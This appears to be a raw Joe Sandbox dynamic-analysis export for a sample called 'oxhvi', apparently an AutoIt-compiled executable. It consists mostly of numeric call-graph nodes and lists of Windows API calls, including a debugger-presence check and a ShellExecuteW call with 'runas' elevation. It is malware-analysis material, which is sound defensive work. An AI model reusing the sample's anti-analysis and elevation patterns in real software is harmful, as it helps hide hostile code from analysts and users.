8 API calls 96043 53eaa6 96042->96043 96043->96051 96057 53d210 254 API calls 96043->96057 96044->96042 96044->96043 96045->96027 96047 583156 96061 5a3ef6 81 API calls __wsopen_s 96047->96061 96048->96012 96051->96031 96051->96047 96051->96048 96052 583131 96051->96052 96054 58310f 96051->96054 96058 534485 254 API calls 96051->96058 96060 5a3ef6 81 API calls __wsopen_s 96052->96060 96059 5a3ef6 81 API calls __wsopen_s 96054->96059 96056->96014 96057->96051 96058->96051 96059->96048 96060->96048 96061->96048 96062->96041 96063->96026 93164 531044 93169 532735 93164->93169 93166 53104a 93205 550433 29 API calls __onexit 93166->93205 93168 531054 93206 5329da 93169->93206 93173 5327ac 93174 53bf07 8 API calls 93173->93174 93175 5327b6 93174->93175 93176 53bf07 8 API calls 93175->93176 93177 5327c0 93176->93177 93178 53bf07 8 API calls 93177->93178 93179 5327ca 93178->93179 93180 53bf07 8 API calls 93179->93180 93181 532808 93180->93181 93182 53bf07 8 API calls 93181->93182 93183 5328d4 93182->93183 93216 532d5e 93183->93216 93187 532906 93188 53bf07 8 API calls 93187->93188 93189 532910 93188->93189 93237 5430e0 93189->93237 93191 53293b 93247 5330ed 93191->93247 93193 532957 93194 532967 GetStdHandle 93193->93194 93195 5739c1 93194->93195 93196 5329bc 93194->93196 93195->93196 93197 5739ca 93195->93197 93199 5329c9 OleInitialize 93196->93199 93198 55016b 8 API calls 93197->93198 93200 5739d1 93198->93200 93199->93166 93254 5a09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 93200->93254 93202 5739da 93255 5a1200 CreateThread 93202->93255 93204 5739e6 CloseHandle 93204->93196 93205->93168 93256 532a33 93206->93256 93209 532a33 8 API calls 93210 532a12 93209->93210 93211 53bf07 8 API calls 93210->93211 93212 532a1e 93211->93212 93213 5384b7 8 API calls 93212->93213 93214 53276b 93213->93214 93215 533205 6 API calls 93214->93215 93215->93173 93217 53bf07 8 API calls 93216->93217 93218 532d6e 93217->93218 
93219 53bf07 8 API calls 93218->93219 93220 532d76 93219->93220 93221 53bf07 8 API calls 93220->93221 93222 532d91 93221->93222 93223 55016b 8 API calls 93222->93223 93224 5328de 93223->93224 93225 53318c 93224->93225 93226 53319a 93225->93226 93227 53bf07 8 API calls 93226->93227 93228 5331a5 93227->93228 93229 53bf07 8 API calls 93228->93229 93230 5331b0 93229->93230 93231 53bf07 8 API calls 93230->93231 93232 5331bb 93231->93232 93233 53bf07 8 API calls 93232->93233 93234 5331c6 93233->93234 93235 55016b 8 API calls 93234->93235 93236 5331d8 RegisterWindowMessageW 93235->93236 93236->93187 93238 543121 93237->93238 93239 5430fd 93237->93239 93263 5505d2 5 API calls __Init_thread_wait 93238->93263 93246 54310e 93239->93246 93265 5505d2 5 API calls __Init_thread_wait 93239->93265 93242 54312b 93242->93239 93264 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93242->93264 93243 549ec7 93243->93246 93266 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93243->93266 93246->93191 93248 573c69 93247->93248 93249 5330fd 93247->93249 93267 5a3b63 8 API calls 93248->93267 93250 55016b 8 API calls 93249->93250 93253 533105 93250->93253 93252 573c74 93253->93193 93254->93202 93255->93204 93268 5a11e6 14 API calls 93255->93268 93257 53bf07 8 API calls 93256->93257 93258 532a3e 93257->93258 93259 53bf07 8 API calls 93258->93259 93260 532a46 93259->93260 93261 53bf07 8 API calls 93260->93261 93262 532a08 93261->93262 93262->93209 93263->93242 93264->93239 93265->93243 93266->93246 93267->93252 93269 55f08e 93270 55f09a ___scrt_is_nonwritable_in_current_image 93269->93270 93271 55f0a6 93270->93271 93272 55f0bb 93270->93272 93288 55f669 20 API calls __dosmaperr 93271->93288 93282 55951d EnterCriticalSection 93272->93282 93275 55f0ab 93289 562b7c 26 API calls __cftof 93275->93289 93276 55f0c7 93283 55f0fb 93276->93283 93281 55f0b6 __wsopen_s 93282->93276 93291 55f126 93283->93291 93285 55f108 93286 55f0d4 93285->93286 93311 55f669 20 API 
calls __dosmaperr 93285->93311 93290 55f0f1 LeaveCriticalSection __fread_nolock 93286->93290 93288->93275 93289->93281 93290->93281 93292 55f134 93291->93292 93293 55f14e 93291->93293 93315 55f669 20 API calls __dosmaperr 93292->93315 93295 55dce5 __fread_nolock 26 API calls 93293->93295 93296 55f157 93295->93296 93312 569799 93296->93312 93297 55f139 93316 562b7c 26 API calls __cftof 93297->93316 93300 55f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 93300->93285 93302 55f1df 93305 55f20e 93302->93305 93307 55f1fc 93302->93307 93303 55f25b 93304 55f268 93303->93304 93303->93305 93318 55f669 20 API calls __dosmaperr 93304->93318 93305->93300 93319 55f2bb 30 API calls 2 library calls 93305->93319 93317 55f43f 31 API calls 4 library calls 93307->93317 93309 55f206 93309->93300 93311->93286 93320 569616 93312->93320 93314 55f173 93314->93300 93314->93302 93314->93303 93315->93297 93316->93300 93317->93309 93318->93300 93319->93300 93321 569622 ___scrt_is_nonwritable_in_current_image 93320->93321 93322 569642 93321->93322 93323 56962a 93321->93323 93325 5696f6 93322->93325 93330 56967a 93322->93330 93355 55f656 20 API calls __dosmaperr 93323->93355 93360 55f656 20 API calls __dosmaperr 93325->93360 93326 56962f 93356 55f669 20 API calls __dosmaperr 93326->93356 93329 5696fb 93361 55f669 20 API calls __dosmaperr 93329->93361 93345 5654d7 EnterCriticalSection 93330->93345 93333 569703 93362 562b7c 26 API calls __cftof 93333->93362 93334 569680 93336 5696a4 93334->93336 93337 5696b9 93334->93337 93357 55f669 20 API calls __dosmaperr 93336->93357 93346 56971b 93337->93346 93339 569637 __wsopen_s 93339->93314 93341 5696a9 93358 55f656 20 API calls __dosmaperr 93341->93358 93342 5696b4 93359 5696ee LeaveCriticalSection __wsopen_s 93342->93359 93345->93334 93347 565754 __wsopen_s 26 API calls 93346->93347 93348 56972d 93347->93348 93349 569746 SetFilePointerEx 93348->93349 93350 569735 93348->93350 93351 56975e GetLastError 93349->93351 93352 56973a 93349->93352 93363 
55f669 20 API calls __dosmaperr 93350->93363 93364 55f633 20 API calls __dosmaperr 93351->93364 93352->93342 93355->93326 93356->93339 93357->93341 93358->93342 93359->93339 93360->93329 93361->93333 93362->93339 93363->93352 93364->93352 96064 540e6f 96065 540e83 96064->96065 96071 5413d5 96064->96071 96066 540e95 96065->96066 96069 55016b 8 API calls 96065->96069 96067 5855d0 96066->96067 96070 540eee 96066->96070 96098 53b3fe 8 API calls 96066->96098 96099 5a1a29 8 API calls 96067->96099 96069->96066 96072 542ad0 254 API calls 96070->96072 96089 54044d messages 96070->96089 96071->96066 96074 53be6d 8 API calls 96071->96074 96095 540326 messages 96072->96095 96074->96066 96075 5862cf 96103 5a3ef6 81 API calls __wsopen_s 96075->96103 96076 541645 96083 53be6d 8 API calls 96076->96083 96076->96089 96078 55016b 8 API calls 96078->96095 96080 585c7f 96087 53be6d 8 API calls 96080->96087 96080->96089 96081 5861fe 96102 5a3ef6 81 API calls __wsopen_s 96081->96102 96082 53be6d 8 API calls 96082->96095 96083->96089 96086 541940 254 API calls 96086->96095 96087->96089 96088 53bf07 8 API calls 96088->96095 96090 550433 29 API calls pre_c_initialization 96090->96095 96091 5505d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96091->96095 96092 5860b9 96100 5a3ef6 81 API calls __wsopen_s 96092->96100 96093 540a5e messages 96101 5a3ef6 81 API calls __wsopen_s 96093->96101 96095->96075 96095->96076 96095->96078 96095->96080 96095->96081 96095->96082 96095->96086 96095->96088 96095->96089 96095->96090 96095->96091 96095->96092 96095->96093 96096 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96095->96096 96097 541e00 40 API calls messages 96095->96097 96096->96095 96097->96095 96098->96066 96099->96089 96100->96093 96101->96089 96102->96089 96103->96089 96104 5415af 96105 54e34f 8 API calls 96104->96105 96106 5415c5 96105->96106 96111 54e3b3 96106->96111 96108 5415ef 96109 
5861ab 96108->96109 96123 5a3ef6 81 API calls __wsopen_s 96108->96123 96112 537a14 8 API calls 96111->96112 96113 54e3ea 96112->96113 96114 53b25f 8 API calls 96113->96114 96117 54e41b 96113->96117 96115 58e4e4 96114->96115 96116 537af4 8 API calls 96115->96116 96118 58e4ef 96116->96118 96117->96108 96124 54e73b 39 API calls 96118->96124 96120 58e502 96122 58e506 96120->96122 96125 53b3fe 8 API calls 96120->96125 96122->96122 96123->96109 96124->96120 96125->96122 93365 55078b 93366 550797 ___scrt_is_nonwritable_in_current_image 93365->93366 93395 550241 93366->93395 93368 5508f1 93436 550bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 93368->93436 93369 55079e 93369->93368 93372 5507c8 93369->93372 93371 5508f8 93429 5551e2 93371->93429 93383 550807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93372->93383 93406 56280d 93372->93406 93379 5507e7 93381 550868 93414 550ce9 93381->93414 93383->93381 93432 5551aa 38 API calls 3 library calls 93383->93432 93384 55086e 93418 5332a2 93384->93418 93389 55088a 93389->93371 93390 55088e 93389->93390 93391 550897 93390->93391 93434 555185 28 API calls _abort 93390->93434 93435 5503d0 13 API calls 2 library calls 93391->93435 93394 55089f 93394->93379 93396 55024a 93395->93396 93438 550a28 IsProcessorFeaturePresent 93396->93438 93398 550256 93439 553024 10 API calls 3 library calls 93398->93439 93400 55025b 93405 55025f 93400->93405 93440 5626a7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93400->93440 93402 550276 93402->93369 93403 550268 93403->93402 93441 55304d 8 API calls 3 library calls 93403->93441 93405->93369 93409 562824 93406->93409 93408 5507e1 93408->93379 93410 5627b1 93408->93410 93442 550e1c 93409->93442 93413 5627e0 93410->93413 93411 550e1c 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93412 562809 93411->93412 93412->93383 93413->93411 93450 5526d0 93414->93450 93417 550d0f 93417->93384 93419 5332ae IsThemeActive 93418->93419 93420 533309 93418->93420 93452 5552d3 93419->93452 93433 550d22 GetModuleHandleW 93420->93433 93422 5332d9 93458 555339 93422->93458 93424 5332e0 93465 53326d SystemParametersInfoW SystemParametersInfoW 93424->93465 93426 5332e7 93466 533312 93426->93466 94453 554f5f 93429->94453 93432->93381 93433->93389 93434->93391 93435->93394 93436->93371 93438->93398 93439->93400 93440->93403 93441->93405 93443 550e25 93442->93443 93444 550e27 IsProcessorFeaturePresent 93442->93444 93443->93408 93446 550fee 93444->93446 93449 550fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93446->93449 93448 5510d1 93448->93408 93449->93448 93451 550cfc GetStartupInfoW 93450->93451 93451->93417 93453 5552df ___scrt_is_nonwritable_in_current_image 93452->93453 93515 5632ee EnterCriticalSection 93453->93515 93455 5552ea pre_c_initialization 93516 55532a 93455->93516 93457 55531f __wsopen_s 93457->93422 93459 555345 93458->93459 93460 55535f 93458->93460 93459->93460 93520 55f669 20 API calls __dosmaperr 93459->93520 93460->93424 93462 55534f 93521 562b7c 26 API calls __cftof 93462->93521 93464 55535a 93464->93424 93465->93426 93467 533322 __wsopen_s 93466->93467 93468 53bf07 8 API calls 93467->93468 93469 53332e GetCurrentDirectoryW 93468->93469 93522 534f60 93469->93522 93515->93455 93519 563336 LeaveCriticalSection 93516->93519 93518 555331 93518->93457 93519->93518 93520->93462 93521->93464 93523 53bf07 8 API calls 93522->93523 93524 534f76 93523->93524 93646 5360f5 93524->93646 93526 534f94 93527 53bceb 8 API calls 93526->93527 93528 534fa8 93527->93528 93529 53be6d 8 API calls 93528->93529 93530 534fb3 93529->93530 93660 5388e8 93530->93660 93533 53b25f 8 API calls 93534 
534fcc 93533->93534 93663 53bdc1 93534->93663 93536 534fdc 93537 53b25f 8 API calls 93536->93537 93538 535002 93537->93538 93539 53bdc1 39 API calls 93538->93539 93540 535011 93539->93540 93541 53bf07 8 API calls 93540->93541 93542 53502f 93541->93542 93667 535151 93542->93667 93546 535049 93547 535053 93546->93547 93548 574afd 93546->93548 93549 554db8 _strftime 40 API calls 93547->93549 93550 535151 8 API calls 93548->93550 93552 53505e 93549->93552 93551 574b11 93550->93551 93554 535151 8 API calls 93551->93554 93552->93551 93553 535068 93552->93553 93555 554db8 _strftime 40 API calls 93553->93555 93556 574b2d 93554->93556 93557 535073 93555->93557 93559 53551b 10 API calls 93556->93559 93557->93556 93647 536102 __wsopen_s 93646->93647 93648 5384b7 8 API calls 93647->93648 93649 536134 93647->93649 93648->93649 93657 53616a 93649->93657 93705 53627c 93649->93705 93651 53b25f 8 API calls 93652 536261 93651->93652 93654 53684e 8 API calls 93652->93654 93653 53b25f 8 API calls 93653->93657 93655 53626d 93654->93655 93655->93526 93656 53684e 8 API calls 93656->93657 93657->93653 93657->93656 93658 536238 93657->93658 93659 53627c 8 API calls 93657->93659 93658->93651 93658->93655 93659->93657 93661 55016b 8 API calls 93660->93661 93662 534fbf 93661->93662 93662->93533 93664 53bdcc 93663->93664 93665 53bdfb 93664->93665 93708 53bf39 39 API calls 93664->93708 93665->93536 93668 53515b 93667->93668 93669 535179 93667->93669 93670 53503b 93668->93670 93672 53be6d 8 API calls 93668->93672 93671 5384b7 8 API calls 93669->93671 93673 554db8 93670->93673 93671->93670 93672->93670 93674 554dc6 93673->93674 93675 554e3b 93673->93675 93682 554deb 93674->93682 93709 55f669 20 API calls __dosmaperr 93674->93709 93711 554e4d 40 API calls 4 library calls 93675->93711 93678 554e48 93678->93546 93679 554dd2 93710 562b7c 26 API calls __cftof 93679->93710 93681 554ddd 93681->93546 93682->93546 93706 53c269 8 API calls 93705->93706 93707 536287 93706->93707 93707->93649 93708->93665 
93709->93679 93710->93681 93711->93678 94454 554f6b FindHandlerForForeignException 94453->94454 94455 554f84 94454->94455 94456 554f72 94454->94456 94477 5632ee EnterCriticalSection 94455->94477 94492 5550b9 GetModuleHandleW 94456->94492 94459 554f77 94459->94455 94493 5550fd GetModuleHandleExW 94459->94493 94460 555029 94481 555069 94460->94481 94464 555000 94469 555018 94464->94469 94470 5627b1 _abort 5 API calls 94464->94470 94466 554f8b 94466->94460 94466->94464 94478 562538 94466->94478 94467 555046 94484 555078 94467->94484 94468 555072 94501 5720c9 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 94468->94501 94471 5627b1 _abort 5 API calls 94469->94471 94470->94469 94471->94460 94477->94466 94502 562271 94478->94502 94521 563336 LeaveCriticalSection 94481->94521 94483 555042 94483->94467 94483->94468 94522 56399c 94484->94522 94487 5550a6 94490 5550fd _abort 8 API calls 94487->94490 94488 555086 GetPEB 94488->94487 94489 555096 GetCurrentProcess TerminateProcess 94488->94489 94489->94487 94491 5550ae ExitProcess 94490->94491 94492->94459 94494 555127 GetProcAddress 94493->94494 94495 55514a 94493->94495 94496 55513c 94494->94496 94497 555150 FreeLibrary 94495->94497 94498 555159 94495->94498 94496->94495 94497->94498 94499 550e1c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94498->94499 94500 554f83 94499->94500 94500->94455 94505 562220 94502->94505 94504 562295 94504->94464 94506 56222c ___scrt_is_nonwritable_in_current_image 94505->94506 94513 5632ee EnterCriticalSection 94506->94513 94508 56223a 94514 5622c1 94508->94514 94512 562258 __wsopen_s 94512->94504 94513->94508 94517 5622e9 94514->94517 94518 5622e1 94514->94518 94515 550e1c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94516 562247 94515->94516 94520 
562265 LeaveCriticalSection _abort 94516->94520 94517->94518 94519 562d58 _free 20 API calls 94517->94519 94518->94515 94519->94518 94520->94512 94521->94483 94523 5639b7 94522->94523 94524 5639c1 94522->94524 94526 550e1c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94523->94526 94529 563367 5 API calls 2 library calls 94524->94529 94528 555082 94526->94528 94527 5639d8 94527->94523 94528->94487 94528->94488 94529->94527 94530 53f48c 94533 53ca50 94530->94533 94534 53ca6b 94533->94534 94535 5814af 94534->94535 94536 581461 94534->94536 94554 53ca90 94534->94554 94597 5b61ff 254 API calls 2 library calls 94535->94597 94539 58146b 94536->94539 94542 581478 94536->94542 94536->94554 94595 5b6690 254 API calls 94539->94595 94556 53cd60 94542->94556 94596 5b6b2d 254 API calls 2 library calls 94542->94596 94545 581742 94545->94545 94546 54e781 39 API calls 94546->94554 94549 53cd8e 94551 58168b 94600 5b6569 81 API calls 94551->94600 94554->94546 94554->94549 94554->94551 94555 53bdc1 39 API calls 94554->94555 94554->94556 94560 53cf30 39 API calls 94554->94560 94562 53be6d 8 API calls 94554->94562 94564 5402f0 94554->94564 94587 54e73b 39 API calls 94554->94587 94588 54aa19 254 API calls 94554->94588 94589 5505d2 5 API calls __Init_thread_wait 94554->94589 94590 54bbd2 8 API calls 94554->94590 94591 550433 29 API calls __onexit 94554->94591 94592 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94554->94592 94593 54f4ed 81 API calls 94554->94593 94594 54f354 254 API calls 94554->94594 94598 53b3fe 8 API calls 94554->94598 94599 58ff4f 8 API calls 94554->94599 94555->94554 94556->94549 94601 5a3ef6 81 API calls __wsopen_s 94556->94601 94560->94554 94562->94554 94583 540326 messages 94564->94583 94565 55016b 8 API calls 94565->94583 94566 5862cf 94668 5a3ef6 81 API calls __wsopen_s 94566->94668 94567 541645 94572 53be6d 8 API calls 94567->94572 94580 54044d messages 
94567->94580 94570 585c7f 94576 53be6d 8 API calls 94570->94576 94570->94580 94571 5861fe 94667 5a3ef6 81 API calls __wsopen_s 94571->94667 94572->94580 94576->94580 94577 53be6d 8 API calls 94577->94583 94578 5505d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94578->94583 94579 53bf07 8 API calls 94579->94583 94580->94554 94581 550433 29 API calls pre_c_initialization 94581->94583 94582 5860b9 94665 5a3ef6 81 API calls __wsopen_s 94582->94665 94583->94565 94583->94566 94583->94567 94583->94570 94583->94571 94583->94577 94583->94578 94583->94579 94583->94580 94583->94581 94583->94582 94585 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94583->94585 94586 540a5e messages 94583->94586 94602 541940 94583->94602 94664 541e00 40 API calls messages 94583->94664 94585->94583 94666 5a3ef6 81 API calls __wsopen_s 94586->94666 94587->94554 94588->94554 94589->94554 94590->94554 94591->94554 94592->94554 94593->94554 94594->94554 94595->94542 94596->94556 94597->94554 94598->94554 94599->94554 94600->94556 94601->94545 94603 541966 94602->94603 94604 5419de 94602->94604 94605 586b04 94603->94605 94606 541973 94603->94606 94607 5869f1 94604->94607 94623 5419ed 94604->94623 94685 5b84db 254 API calls 2 library calls 94605->94685 94615 586b28 94606->94615 94616 54197d 94606->94616 94609 586af8 94607->94609 94610 5869fc 94607->94610 94684 5a3ef6 81 API calls __wsopen_s 94609->94684 94683 54b2d6 254 API calls 94610->94683 94612 586b59 94617 586b64 94612->94617 94618 586b86 94612->94618 94613 5402f0 254 API calls 94613->94623 94615->94612 94622 586b40 94615->94622 94621 53be6d 8 API calls 94616->94621 94663 541990 messages 94616->94663 94687 5b84db 254 API calls 2 library calls 94617->94687 94688 5b5fe6 8 API calls 94618->94688 94620 541b65 94620->94583 94621->94663 94686 5a3ef6 81 API calls __wsopen_s 94622->94686 94623->94613 94623->94620 94624 58691d 94623->94624 94629 5868ac 
94623->94629 94641 541b59 94623->94641 94647 541aa4 94623->94647 94623->94663 94682 5a3ef6 81 API calls __wsopen_s 94624->94682 94626 586d7d 94634 586db3 94626->94634 94788 5b80ce 65 API calls 94626->94788 94627 586b91 94632 586c25 94627->94632 94642 586bac 94627->94642 94681 5a3ef6 81 API calls __wsopen_s 94629->94681 94760 5a19ed 8 API calls 94632->94760 94790 53b3fe 8 API calls 94634->94790 94635 586d5b 94764 538e70 94635->94764 94638 53be6d 8 API calls 94638->94663 94640 586d91 94643 538e70 52 API calls 94640->94643 94641->94620 94680 5a3ef6 81 API calls __wsopen_s 94641->94680 94689 5a13a0 8 API calls 94642->94689 94658 586d99 _wcslen 94643->94658 94646 586c37 94761 53bc9b 8 API calls 94646->94761 94647->94641 94669 541c50 94647->94669 94649 5868c1 messages 94649->94624 94659 541b12 messages 94649->94659 94661 5419d3 messages 94649->94661 94652 541b05 94652->94641 94652->94659 94653 586d63 _wcslen 94653->94626 94787 53b3fe 8 API calls 94653->94787 94654 586bd6 94690 542ad0 94654->94690 94655 586c40 94762 5a13a0 8 API calls 94655->94762 94658->94634 94789 53b3fe 8 API calls 94658->94789 94659->94638 94659->94661 94659->94663 94661->94583 94663->94626 94663->94661 94763 5b7f8f 53 API calls __wsopen_s 94663->94763 94664->94583 94665->94586 94666->94580 94667->94580 94668->94580 94670 541c62 94669->94670 94673 541c6b 94670->94673 94791 54b71c 8 API calls 94670->94791 94672 541d20 94672->94652 94673->94672 94674 55016b 8 API calls 94673->94674 94675 541d89 94674->94675 94676 55016b 8 API calls 94675->94676 94677 541d92 94676->94677 94678 53b25f 8 API calls 94677->94678 94679 541da1 94678->94679 94679->94652 94680->94661 94681->94649 94682->94663 94683->94659 94684->94605 94685->94663 94686->94661 94687->94663 94688->94627 94689->94654 94691 542b36 94690->94691 94692 542f70 94690->94692 94694 587b7c 94691->94694 94695 542b50 94691->94695 95132 5505d2 5 API calls __Init_thread_wait 94692->95132 95137 5b79f9 254 API calls 94694->95137 94698 5430e0 9 API calls 
94695->94698 94697 542f7a 94701 53b25f 8 API calls 94697->94701 94705 542fbb 94697->94705 94700 542b60 94698->94700 94699 587b88 94699->94663 94702 5430e0 9 API calls 94700->94702 94710 542f94 94701->94710 94703 542b76 94702->94703 94703->94705 94706 542bac 94703->94706 94704 587b91 95138 5a3ef6 81 API calls __wsopen_s 94704->95138 94705->94704 94707 542fec 94705->94707 94706->94704 94730 542bc8 __fread_nolock 94706->94730 95134 53b3fe 8 API calls 94707->95134 95133 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94710->95133 94712 542ff9 95135 54e662 254 API calls 94712->95135 94713 587bb9 95139 5a3ef6 81 API calls __wsopen_s 94713->95139 94715 542cef 94717 587c1c 94715->94717 94718 542cfc 94715->94718 95141 5b60a2 53 API calls _wcslen 94717->95141 94719 5430e0 9 API calls 94718->94719 94721 542d09 94719->94721 94724 587d45 94721->94724 94726 5430e0 9 API calls 94721->94726 94722 55016b 8 API calls 94722->94730 94723 55019b 8 API calls 94723->94730 94734 587bb4 94724->94734 95142 5a3ef6 81 API calls __wsopen_s 94724->95142 94725 543032 95136 54fe59 8 API calls 94725->95136 94732 542d23 94726->94732 94729 5402f0 254 API calls 94729->94730 94730->94712 94730->94713 94730->94715 94730->94722 94730->94723 94730->94729 94731 587bfd 94730->94731 94730->94734 95140 5a3ef6 81 API calls __wsopen_s 94731->95140 94732->94724 94735 53be6d 8 API calls 94732->94735 94737 542d87 messages 94732->94737 94734->94663 94735->94737 94736 5430e0 9 API calls 94736->94737 94737->94724 94737->94725 94737->94734 94737->94736 94740 542e3b messages 94737->94740 94741 537953 CloseHandle 94737->94741 94792 5a65b4 94737->94792 94797 54f95e 94737->94797 94804 5bcd16 94737->94804 94893 5a4ad5 94737->94893 94898 5a5ed5 94737->94898 94928 5a874a 94737->94928 94955 5a6561 94737->94955 94962 59e9c5 GetFileAttributesW 94737->94962 94964 5ba4b4 94737->94964 94970 5b9eea 94737->94970 94973 5beb63 94737->94973 95009 5bac49 94737->95009 95014 537923 94737->95014 95019 5ba8ae 

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 00535DA7
  • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
• GetCurrentProcess.KERNEL32(?,005CDC2C,00000000,?,?), ref: 00535ED3
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00535EDA
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00535F05
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00535F17
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00535F25
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00535F2C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00535F51
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O$
• API String ID: 3290436268-1104098451
• Opcode ID: 58390a5721ac6d41bd95156a034179a531393960a57965744cb3b3d7c81adba4
• Instruction ID: 62e233db4eef6a0f4d891e4c9330ecfdc6a6681ec31a7163a7cb707ec5231007
• Opcode Fuzzy Hash: 58390a5721ac6d41bd95156a034179a531393960a57965744cb3b3d7c81adba4
• Instruction Fuzzy Hash: D1A1A53188A7E2CFC71ECB687C6C59B7F667F26700B14BC99D48593261D2684948DB31

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005332EF,?), ref: 00533342
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005332EF,?), ref: 00533355
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00602418,00602400,?,?,?,?,?,?,005332EF,?), ref: 005333C1
  • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
  • Part of subcall function 005341E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005333E9,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00534227
• SetCurrentDirectoryW.KERNELBASE(?,00000001,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00533442
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00573C8A
• SetCurrentDirectoryW.KERNEL32(?,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00573CCB
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005F31F4,00602418,?,?,?,?,?,?,?,005332EF), ref: 00573D54
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00573D5B
  • Part of subcall function 0053345A: GetSysColorBrush.USER32(0000000F), ref: 00533465
  • Part of subcall function 0053345A: LoadCursorW.USER32(00000000,00007F00), ref: 00533474
                                                                                                                                                        • Part of subcall function 0053345A: LoadIconW.USER32(00000063), ref: 0053348A
                                                                                                                                                        • Part of subcall function 0053345A: LoadIconW.USER32(000000A4), ref: 0053349C
                                                                                                                                                        • Part of subcall function 0053345A: LoadIconW.USER32(000000A2), ref: 005334AE
                                                                                                                                                        • Part of subcall function 0053345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005334C6
                                                                                                                                                        • Part of subcall function 0053345A: RegisterClassExW.USER32(?), ref: 00533517
                                                                                                                                                        • Part of subcall function 0053353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00533568
                                                                                                                                                        • Part of subcall function 0053353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00533589
                                                                                                                                                        • Part of subcall function 0053353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 0053359D
                                                                                                                                                        • Part of subcall function 0053353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 005335A6
                                                                                                                                                        • Part of subcall function 005338F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005339C3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
